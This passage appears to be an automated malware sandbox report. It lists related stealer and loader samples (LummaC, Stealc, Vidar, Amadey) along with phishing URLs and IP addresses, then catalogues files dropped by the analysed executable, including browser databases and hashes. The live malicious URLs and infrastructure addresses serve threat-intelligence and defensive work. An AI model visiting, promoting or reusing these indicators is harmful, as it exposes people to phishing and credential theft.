	Dzsb.Qyd.Install.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
RACKPLACEDE	.gov.ua.html	Get hash	malicious	Unknown	Browse	31.214.157.49
	.gov.ua.html	Get hash	malicious	Unknown	Browse	31.214.157.49
	N6jsQ3XNNX.exe	Get hash	malicious	Socks5Systemz	Browse	31.214.157.226
	5nv1p4kFmC.exe	Get hash	malicious	Socks5Systemz	Browse	31.214.157.42
	QnWrzyeT88.exe	Get hash	malicious	Socks5Systemz	Browse	31.214.157.42
	cv viewer plugin 8.31.40.exe	Get hash	malicious	Socks5Systemz	Browse	31.214.157.226
	REMITTANCE-NOTICE-For-Norriselectricxslx.pdf	Get hash	malicious	Unknown	Browse	31.214.157.73
	ELECTRONIC RECEIPT_Servier.html	Get hash	malicious	Unknown	Browse	31.214.157.167
	http://0nlinenfidiesnsdiffu9ehwsxmcmv1kgpeiwush0rfvtdgs2.omega-wls.com	Get hash	malicious	Unknown	Browse	31.214.157.167
	ELECTRONIC RECEIPT_Pvtgroup.html	Get hash	malicious	Unknown	Browse	31.214.157.167
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29t	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://brand.page/N0www1904	Get hash	malicious	Unknown	Browse	104.21.56.60
	AssumedAlready.exe	Get hash	malicious	LummaC	Browse	172.67.200.190
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	loader.exe	Get hash	malicious	LummaC	Browse	172.67.150.243
	c2_Acid.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	XRuncher_2.5.0.6.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	Remittance Advice__cybg.com_4093180040.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC	Browse	52.149.20.212 13.107.246.45
	https://bankinter.codix-imx.solutions/iMX/login.jsp	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.45
	https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29t	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.45
	VNC Sales.xlsx	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	52.149.20.212 13.107.246.45
	https://www.google.es/url?q=query6iir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fsafrareal.com.br%2fyoya%2fsjnviflutf2ksz0koshykwmhlhv20ssu2pivu/amZlcmd1c29uQHN5bmVyZ2lzZWR1Y2F0aW9uLmNvbQ==$?	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.45
	Remittance Advice__cybg.com_4093180040.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	52.149.20.212 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.149.20.212 13.107.246.45
	https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VVmliM0U9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	52.149.20.212 13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	52.149.20.212 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	VNC Sales.xlsx	Get hash	malicious	Unknown	Browse	52.182.141.63 104.21.80.55
	AssumedAlready.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	loader.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	c2_Acid.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	XRuncher_2.5.0.6.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.182.141.63 104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	52.182.141.63 104.21.80.55
	Dzsb.Qyd.Install.exe	Get hash	malicious	XRed	Browse	52.182.141.63 104.21.80.55

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGCFIIEBKEGHJJJJJJDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EShineEncoder\EShineEncoder.exe

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3766874
Entropy (8bit):	6.577509718348026
Encrypted:	false
SSDEEP:	49152:1QeEr1e0ZaFnh+k7jsIJT/Kw0TA9CcvD7irKV3JV7Dzy:1QeExTIFJTV0TAccvD7imV5tzy
MD5:	F978D5EBA9977AF32374DCB616CB63FE
SHA1:	D45C19F173D68FB11DD1C358B42B135E634EBE4E
SHA-256:	2921409FA28850E3C1874AE52A25B00F93961C278CF131F11F67CEE89061F7C8
SHA-512:	0075C468DB47B8F92B9D329089A61FD554C5F7FC374BE34FCFF8F925DBA334BA41BAB09303E16D32607597AF5E2636203DB312C412FC68B3BEE60A799620FE9F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..L............................8.............@...........................9......c:.................................................P...............................................................................4............................text............................... ..`.rdata..T...........................@..@.data....c...0...0..................@....rsrc................<..............@..@.pqr7....$......Z"...X..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EShineEncoder\sqlite3.dll

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\ProgramData\FCBAECGIEBKKFHIDAKEC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAKJDHIEBFIIDGDGDBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDGIJEGHDAECAKECAFCAKFCGDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJDBGDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JECGIIIDAKJDHJKFHIEBFCGHCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	unknown
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3107697815297479
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
MD5:	74AAD92BF5B982B66A53496D624E9C43
SHA1:	CF16FC890B46FE96F6868606B6BEB8921652A35F
SHA-256:	F9C6C57C8C7961F2E7CC72F45FAB319ABD172A2EF8C2040DDE80EF1435151278
SHA-512:	A95B8F9296B74AA3F72CDA2F59434E08D5128E9CFD892BC9EEB399088A5328F2BDCE00811655C0FFBCD7687AA49395B2A305BF697F2A088B6F1ABB268003A208
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa0af6d9f, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42215418335561405
Encrypted:	false
SSDEEP:	1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
MD5:	1296472EF546789F23F409C729B26346
SHA1:	6F15E30D7D8A57CC1659E51A1B6B3D432B94FBC6
SHA-256:	4CA7CA265707103349B07424D52FD032470A6737B40BCB04010470EAC9DEE153
SHA-512:	C1E64A175583595D34C073D4A61AF54BB7AE91BCEDB24600DBDA9F262A50B2D750330EC4680C9AE03EE245A3192B1EBD5F26CE2DF2FB6290B49D05760D5B38D0
Malicious:	false
Reputation:	unknown
Preview:	..m.... .......Y.......X\...;...{......................n.%..........\|.......\|..h.'.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................Xu.....\|1.................=........\|1..........................#......h.'.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07579635291414683
Encrypted:	false
SSDEEP:	3:i/WetYeeJquQvG3uINZyAllOE/tlnl+/rTc:i/TzEquQKjNZyApMP
MD5:	7ACA3F033B37D78755C667129910698C
SHA1:	F145E3322B7D0C80C6C48FF6CEAD39023C27C557
SHA-256:	5D83ADE873449EAF5AF1AE0140B12C6D90C20474B2451D3B193B251A9F9A5F65
SHA-512:	07144FDB17D875D89813326C739ADF4D17DCEA36B618DB3675A9A70A8EC10BB5B9EBCB51176622F904E0011E65DD667AE3DC2FD97B9E153274F48BBAAF7A8B60
Malicious:	false
Reputation:	unknown
Preview:	.l.j.....................................;...{.......\|.......\|...............\|.......\|..'>JH.....\|..................1.8......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\es1115it47.dat

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Q:Q
MD5:	7E3E4672576E72565613AD0E9B4B73B4
SHA1:	6A1F756C49409C3919ABA5C26DEE638E9E62CA53
SHA-256:	42CED04B826F8BFD6656D97B7288105A2B9F68AE6D22F6A00506404CCB362F2C
SHA-512:	83C73A2E55721FED42FE5E7D9FC251151954DC7BC6F56D78BCAC76D8D87CA44AEFB535A313FB7C6F71FEE4EC227FBA66C0599DD3665C8BCDC141FC5681739C3B
Malicious:	false
Reputation:	unknown
Preview:	wH7g....

C:\ProgramData\es1115rc47.dat

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:e:e
MD5:	0B29C6F981EC5A7285AF75E0CEDD2ADB
SHA1:	EBFCBFA49ED670905147A75CCE68959AD27C7A5F
SHA-256:	67F3B78BE1ABCF789BA8E3B174A41E54B417C8B3C1041DADD5E3DB19D01730FB
SHA-512:	22C4BC4A5A5F6C8FBA70FC9FE00788E50D562163D39B57268614C153E1ABC16E8D957909B0D693BAFF55B6626B36252599AF984907E94892932329717D5B9B17
Malicious:	false
Reputation:	unknown
Preview:	....

C:\ProgramData\es1115resa.dat

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.9545817380615236
Encrypted:	false
SSDEEP:	3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
MD5:	98DDA7FC0B3E548B68DE836D333D1539
SHA1:	D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
SHA-256:	870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
SHA-512:	E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
Malicious:	false
Reputation:	unknown
Preview:	30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

C:\ProgramData\es1115resb.dat

Download File

Process:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	1.7095628900165245
Encrypted:	false
SSDEEP:	3:LDXdQSWBdMUE/:LLdQSGd
MD5:	4FFFD4D2A32CBF8FB78D521B4CC06680
SHA1:	3FA6EFA82F738740179A9388D8046619C7EBDF54
SHA-256:	EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
SHA-512:	130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
Malicious:	false
Reputation:	unknown
Preview:	dad6f9fa0c8327344d1aa24f183c3767................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
